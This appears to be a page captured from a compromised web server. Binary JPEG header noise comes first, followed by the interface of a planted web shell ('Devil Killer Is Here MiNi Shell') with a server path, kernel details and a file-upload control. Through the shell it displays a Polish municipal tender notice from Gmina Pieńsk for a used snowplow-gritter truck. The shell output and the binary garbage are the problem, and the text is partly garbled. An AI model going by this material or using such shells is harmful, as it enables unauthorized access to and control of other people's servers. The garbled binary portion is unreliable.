JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220705/0023845301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodów dla Zakładu Usług Komunalnych w Pieńsku – zakup pługopiaskarki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesławiecka 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757786-511-514 wew. 110</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757786405</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodów dla Zakładu Usług Komunalnych w Pieńsku – zakup pługopiaskarki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7b1f90e-fc2d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00238453</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023103/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup samochodów dla Zakładu Usług Komunalnych w Pieńsku -zakup pługopiaskarki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.piensk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej przy użyciu mini<br/>Portalu https://miniportal.uzp.gov.pl/, e PUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej, e-mail nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej: Zamawiający wymaga, aby w tytule maila był podany nr sprawy, co<br/>ułatwi komunikację pomiędzy stronami postępowania. 2) Wszelką korespondencję związaną<br/>zniniejszym postępowaniem, należy przekazywać za pośrednictwem ePUAP lub poczty elektronicznej<br/>na adres: nowicki@piensk.com.pl Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze<br/>do Zamawiającego przed upływem wymaganego terminu. 3) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.Wykonawca<br/>posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku<br/>oraz do formularza do komunikacji.4) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie<br/>korzystania z miniPortalu dostępnym pod adresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspxoraz<br/>Regulaminie ePUAP.5) Wykonawca przystępując do niniejszego postępowania o udzielenie<br/>zamówienia publicznego, akceptuje warunki korzystania zminiPortalu, określone w<br/>RegulaminieminiPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień<br/>tegoregulaminu.6) Maksymalny rozmiar plików przesyłanych zapośrednictwem dedykowanych<br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi150 MB.7) Za datę przekazania<br/>oferty,oświadczenia, o którym mowa w art. 125 ust. 1 pzp,podmiotowych środków<br/>dowodowych,przedmiotowych środków dowodowych oraz<br/>innych informacji,oświadczeń lub dokumentów,przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania naePUAP. 8) W postępowaniu o udzielenie zamówienia korespondencja elektroniczna<br/>(inna niż oferta Wykonawcy i załączniki do oferty)odbywa się elektronicznie za pośrednictwem dedykowanegoformularzadostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do<br/>komunikacji).Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We<br/>wszelkiejkorespondencji związanej z niniejszympostępowaniem Zamawiający i Wykonawcy posługują<br/>sięnumerem ogłoszenia (BZP). 9) Dokumentyelektroniczne, oświadczenia lub elektroniczne<br/>kopiedokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza<br/>dokomunikacji jako załączniki. Zamawiający dopuszczarównież możliwość składania<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopiidokumentów lub oświadczeń za<br/>pomocą pocztyelektronicznej, na adres email: nowicki@piensk.com.pl Sposób sporządzenia<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody zwymaganiami określonymi w rozporządzeniu Prezesa RadyMinistrów z dnia 30 grudnia<br/>2020 r. wsprawie sposobu sporządzania i przekazywania informacji orazwymagań technicznych<br/>dladokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub konkursie)10) Zamawiający nie przewidujesposobu<br/>komunikowania się zWykonawcami w inny sposób niż przy użyciu środków komunikacjielektronicznej,<br/>wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej„RODO”)<br/>(Dz.U. UE. L. 119.1 z 04.05.2016) informuję, iż:1) Administratorem danych osobowych jest Pani<br/>Agnieszka Demichowicz Z administratorem można się skontaktować poprzez adres<br/>email:iod@piensk.com.pl lub pisemnie na adres siedziby administratora;2) Administrator<br/>wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez<br/>emailiod@piensk.com.pl Z inspektorem ochronydanych można się kontaktować we wszystkich<br/>sprawachdotyczących przetwarzania danychosobowych oraz korzystania z praw związanych z<br/>przetwarzaniemdanych;3) zgodnie z treścią art. 6ust. 1 lit. c RODO Pani/Pana dane osobowe<br/>przetwarzane będą wcelu realizacji procesu wyboruwykonawcy na podstawie prowadzonego<br/>postępowania o udzieleniezamówienia publicznego, anastępnie realizacji postanowień umownych<br/>związanych z wykonywanymzamówieniem;4) w związku zprzetwarzaniem Pani/Pana danych w celach<br/>wskazanych powyżej, daneosobowe mogą byćudostępniane innym odbiorcom lub kategoriom<br/>odbiorców danych osobowych, napodstawie przepisówprawa oraz zawartych umów powierzenia<br/>przetwarzania danych, jeżeli wymaganebyłoby to w celurealizacji postanowień umownych,5) w<br/>odniesieniu do Pani/Pana danych osobowychdecyzje nie będąpodejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;6)Pani/Pana dane osobowebędą przechowywane,<br/>zgodnie z art. 97 ust. 1 ustawy – Prawo zamówieńpublicznych przez okres 4 latod dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czastrwania umowy przekracza 4lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;7) posiadaPani/Pan prawo do:a)dostępu do<br/>danych osobowych, na podstawie art. 15 RODO, przy czymadministrator może żądać odosoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mającychna celu sprecyzowanieżądania, w<br/>szczególności podania nazwy lub daty postępowania o udzieleniezamówieniapublicznego;b)<br/>sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16RODO, przyczym skorzystanie<br/>z niniejszego uprawnienia nie może skutkować zmianą wynikupostępowania oudzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresieniezgodnym z ustawą– Prawo zamówień<br/>publicznych;c) ograniczenia przetwarzania danychosobowych, na podstawie art.18 RODO, przy czym<br/>wystąpienie z żądaniem nie ograniczaprzetwarzania danych osobowych doczasu zakończenia<br/>postępowania o udzielenie zamówieniapublicznego;d) wniesienia skargi doPrezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danychosobowych narusza przepisy RODO;8) nie przysługuje Pani/Panu prawo do:a)usunięcia lub przenoszenia danych osobowych,b)<br/>wniesienia sprzeciwu wobec przetwarzania danych osobowych;9)podanie danych osobowych jest<br/>konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji<br/>postanowień umownych. Niepodanie danych będzie skutkowało brakiem możliwości rozpatrzenia<br/>oferty<br/>złożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ISM.03.271.PN.06.2022r.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 158536,59 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia jest dostawa 1 szt. używanej pługopiaskarki o następujących parametrach,<br/> Pojazd:<br/>Rok produkcji 2006-2010<br/>DMC &gt;19000 kg<br/>Moc 170-190kW<br/>Pojemność silnika 5500-6000 cm3<br/>Przebieg 180000-210000<br/>Rozstaw osi 4100 mm<br/>Szerokość 2540mm<br/>Wysokość 3000mmm<br/>Długość (bez pługa) 7500-7700mm<br/>Skrzynia biegów Manualna<br/>Napęd 4x2 z blokadą mostu<br/>Drzwi z dodatkowym dolnym przeszkleniem, powiększającym pole widzenia kierowcy i pasażera<br/>Zawieszenie przednie i tylne na resorze (wzmacniany)<br/>Układ wydechowy ze stali nierdzewnej<br/>Zbiornik paliwa wykonany ze stali odpornej na korozję<br/>Oświetlenie ostrzegawcze + oświetlenie dodatkowe (do pracy pługa oraz do załadunku piaskarki)<br/>Kabina krótka i niska<br/>3 miejsca siedzące<br/>Napęd hydrauliki piaskarki oraz pługa śnieżnego, hydraulicznego z funkcją pływania i sterownikami w kabinie pojazdu<br/>Przeniesienie napędu poprzez przystawkę z koła zamachowego silnika pojazdu<br/>Nowa płyta czołowa do montażu pługa śnieżnego<br/>Koła 22,5 cala<br/>Zewnętrzny filtr paliwa z pompką<br/>Zewnętrzny zbiornik oleju hydrauliki komunalnej<br/>Odnowione powłoki lakiernicze, zastosowane specjalistyczne lakiery przeznaczone do pracy w ciężkich warunkach <br/>Pojazd fabrycznie zarejestrowany jako specjalny posypywarka.<br/><br/>Piaskarka<br/>Producent posiadający autoryzowany serwis w Polsce<br/>Pojemność 5-6 m3<br/>Podajnik taśmowy<br/>Taśma progowa<br/>Układ solanki 2000-2300 l<br/>Krata zabezpieczająca<br/>Nowa plandeka osłonowa<br/>Napęd hydrauliczny, z hydrauliki pojazdu, sterowanie dawką materiału oraz szerokością sypania <br/>z kabiny pojazdu<br/>Szerokość piaskarki 230-260 cm<br/>Piaskarka fabrycznie zintegrowana z pojazdem, wyposażona w błotniki i osłony boczne na całej długości oraz oświetlenie obrysowe<br/>Odnowione powłoki lakiernicze, zastosowane specjalistyczne lakiery przeznaczone do pracy w ciężkich warunkach usunięta korozja w procesie piaskowania<br/><br/>Pług <br/>Szerokość całkowita 350-370 cm<br/>Szerokość robocza 280-320 cm<br/>Pług segmentowy - trzyelementowy<br/>Każdy z segmentów odkładnicy zawieszony na czterech wahaczach <br/>Siłowniki skrętu segmentowe<br/>Siłownik podnoszenia i docisku dwukierunkowy<br/>Ślizgi podporowe<br/>Lemiesze stalowo gumowe<br/>Dodatkowe lemiesze gumowe<br/>Oświetlenie obrysowe<br/>Odnowione powłoki lakiernicze, zastosowane specjalistyczne lakiery przeznaczone do pracy <br/>w ciężkich warunkach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144400-2 - Pojazdy utrzymania dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144440-4 - Piaskarki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże wykonane dostawy <br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostaw zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy<br/> Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał dostawę co najmniej 1 samochodu typu pługopiaskarka który odpowiada przedmiotowi zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji informacji o Działalności Gospodarczej, w zakresie art.109 ust.1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.2.oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r.o<br/>ochronie konkurencji i konsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który<br/>złożył odrębną ofertę,ofertę częściową lub wniosek o dopuszczenie doudziału w postępowaniu, albo<br/>oświadczenia oprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymiprzygotowanie oferty,oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniuniezależnie odinnego wykonawcy należącego do tej samej grupy kapitałowej3. W<br/>przypadkuwykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów nazasadach<br/>określonych wart. 118 ustawy, Zamawiający żąda przedstawienia w odniesieniudo tych podmiotów<br/>dokumentwymieniony w pkt IX.4.1).4. Zamawiający żąda od wykonawcy przedstawienia<br/>dokumentówwymienionych w pktIX.4.1), dotyczących podwykonawcy, któremu zamierza powierzyć<br/>wykonanieczęścizamówienia, a który nie jest podmiotem, na którego zdolnościach lub sytuacji<br/>wykonawcapolegana zasadach określonych w art. 118 ustawy.5. W przypadku wykonawców<br/>ubiegających się wspólnie oudzielenie zamówienia, dokumentywymienione w pkt. IX.4.1) winien<br/>dołączyć każdy podmiotwystępujący wspólnie. Dokumentwinien być potwierdzony za zgodność z<br/>oryginałem i złożony w formieelektronicznejopatrzonej podpisem zaufanym lub podpisem osobistym<br/>zgodnie z § 14 ust.3Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r.<br/>wsprawiepodmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakichmożeżądać zamawiający od wykonawcy.6. Jeżeli wykonawca ma siedzibę lub miejsce<br/>zamieszkania pozaterytorium RzeczpospolitejPolskiej, zamiast dokumentów, o których mowa w pkt<br/>IX.4.1) składadokument lubdokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejscezamieszkania,potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości,jegoaktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jegodziałalnośćgospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzajusytuacji<br/>wynikającej zpodobnej procedury przewidzianej w przepisach miejsca wszczęciatej procedury.<br/>Dokumenty powinnybyć wystawione nie wcześniej niż 3 miesięcy przedupływem terminu składania<br/>ofert.7. Jeżeli w kraju, wktórym wykonawca ma siedzibę lub miejsce zamieszkania lub<br/>miejscezamieszkania ma osoba, którejdokument dotyczy, nie wydaje się dokumentów, o którychmowa<br/>w pkt IX.4. ppkt.5, zastępuje się jeodpowiednio w całości lub w części dokumentemzawierającym<br/>odpowiednio oświadczenie wykonawcy,ze wskazaniem osoby albo osóbuprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, którejdokument miałdotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma 